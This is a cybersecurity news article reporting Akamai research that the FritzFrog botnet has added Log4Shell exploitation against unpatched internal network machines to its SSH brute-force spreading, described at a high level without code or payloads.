Governance & Risk Management , Patch Management

FritzFrog Botnet Exploits Log4Shell

Botnet Looks for Vulnerable Internal Network Machines
FritzFrog Botnet Exploits Log4Shell
Log4Shell strikes again. (Image: Shutterstock)

Delivering more proof that the Log4Shell vulnerability is endemic, Akamai researchers detected botnet malware updated to use the flaw as an infection vector, supplementing its usual remote login brute force technique.

See Also: Finding and Managing the Risk in your IT Estate: A Comprehensive Overview

Akamai Security Intelligence Group observed the shift in the FritzFrog botnet, first documented in 2020.

Log4Shell, tracked as CVE-2021-44228, burst into public awareness in late 2021 when security researchers identified a flaw in the ubiquitous Apache Log4J 2 Java library. A panel of U.S. public and private sector security experts in mid-2022 warned that patching every vulnerable Log4j instance would likely take a decade "or longer" (see: Log4j Flaw Is 'Endemic,' Says Cyber Safety Review Board).

To spread their malware, FritzFrog operators exploit the fact that system administrators give lower priority to patching internal network machines. Internet-facing applications are an obvious priority for patching. But unpatched internal machines can still be a risk, the researchers said. FritzFrog looks for subnets and targets possible addresses within them.

"This means that even if the 'high-profile' internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can expose unpatched internal assets to exploitation," they said.

To trigger the Log4Shell vulnerability, FritzFrog forces an application to log data containing a malicious payload. The payload forces the Java application to connect to a server controlled by the attacker and download a malware binary.

Researchers in 2022 called FritzFrog a "new generation" of botnet for its use of a proprietary peer-to-peer protocol to spread across SSH servers worldwide.

It still uses brute force techniques to infect SSH servers, Akamai said, but will now "also attempt to identify specific SSH targets by enumerating several system logs on each of its victims."


About the Author

Prajeet Nair

Prajeet Nair

Assistant Editor, Global News Desk, ISMG

Nair previously worked at TechCircle, IDG, Times Group and other publications, where he reported on developments in enterprise technology, digital transformation and other issues.




Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing inforisktoday.asia, you agree to our use of cookies.